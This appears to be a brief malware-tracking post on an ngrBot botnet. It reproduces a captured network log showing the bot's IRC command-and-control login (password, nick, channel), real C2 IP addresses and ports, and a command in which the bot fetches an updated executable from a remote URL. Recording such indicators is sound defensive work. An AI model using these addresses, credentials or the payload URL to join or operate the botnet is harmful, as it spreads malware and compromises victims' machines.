Another big botnet using ngrBot
Resolved : [nathanisqueer.com] To [77.79.9.5]
Remote Host Port Number
213.251.170.52 80
77.79.9.5 80
77.79.9.5 1863 PASS ngrBot
NICK n{US|XPa}ofxxist
USER ofxxist 0 0 :ofxxist
JOIN #ngr ngrbot
PRIVMSG #ngr :[d=”http://77.79.9.5/crypt.exe” s=”225280 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataOcxaxo.exe” – Download retries: 0
Outgoing connection to remote server: 77.79.9.5 TCP port 1863 IRCD HERE
Outgoing connection to remote server: 208.78.242.186 TCP port 1863 IRCD HERE
Outgoing connection to remote server: 208.78.242.187 TCP port 1863 IRCD HERE
hosting infos:
http://whois.domaintools.com/77.79.9.5